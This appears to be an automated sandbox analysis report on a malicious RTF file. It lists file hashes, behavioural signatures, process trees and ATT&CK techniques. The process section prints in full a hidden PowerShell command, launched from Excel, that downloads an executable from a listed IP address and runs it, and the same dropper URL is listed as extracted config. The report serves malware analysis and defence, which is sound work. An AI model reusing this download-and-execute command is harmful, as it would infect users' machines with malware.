894bd85e8489f2ceeb14a9cd0c0b028d9749db622ad3bc68ccfc33323a92bd17

General

Target

SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
Size

97KB
MD5

340e15c9ee5ae17758bb2e4a7890c0c0
SHA1

7bd2df48ad16fe08db23700ab57e781048f9bc76
SHA256

894bd85e8489f2ceeb14a9cd0c0b028d9749db622ad3bc68ccfc33323a92bd17
SHA512

b93846e9dffea0449e4a1f441aa4956da9220c41d2564838e0ac95c4a0a6878dfdf0163087a42834e2edd59751c9097e3bd0834d06405060db3a1ab68a33ada6

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://185.208.211.67/scorp/Class.sfx.exe

Signatures

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

WINWORD.EXEEXCEL.EXEexcelcnv.exe

pid	process
1508	WINWORD.EXE
1508	WINWORD.EXE
1508	WINWORD.EXE
3988	EXCEL.EXE
3988	EXCEL.EXE
3988	EXCEL.EXE
3988	EXCEL.EXE
1112	excelcnv.exe
1508	WINWORD.EXE
1508	WINWORD.EXE
1508	WINWORD.EXE
1508	WINWORD.EXE
1508	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

EXCEL.EXE

description	pid	process	target process
PID 3988 wrote to memory of 1672	3988	EXCEL.EXE	powershell.exe
PID 3988 wrote to memory of 1672	3988	EXCEL.EXE	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1672 powershell.exe

description	pid	process
Token: SeDebugPrivilege	1672	powershell.exe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

excelcnv.exeWINWORD.EXEEXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEexcelcnv.exeWINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

1508 WINWORD.EXE
1508 WINWORD.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1672	3988	powershell.exe	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1672 powershell.exe
1672 powershell.exe
1672 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

WINWORD.EXE

pid process

1508 WINWORD.EXE
1508 WINWORD.EXE
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

18 1672 powershell.exe

pid	process
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe

flow	pid	process
18	1672	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf" /o ""
1⤵
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
PID:1508

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Enumerates system info in registry
PID:3988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://185.208.211.67/scorp/Class.sfx.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\newfile.Exe')
2⤵
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:1672

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Enumerates system info in registry
PID:1112

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1ACB2710-4DF2-4E17-85A7-B0AE2673A7D9

Download Submit
C:\Users\Admin\AppData\Local\Temp\.ses

Download Submit
memory/1672-3-0x0000000000000000-mapping.dmp

Download
memory/3988-0-0x000001890D4A2000-0x000001890D508000-memory.dmp

Filesize
408KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads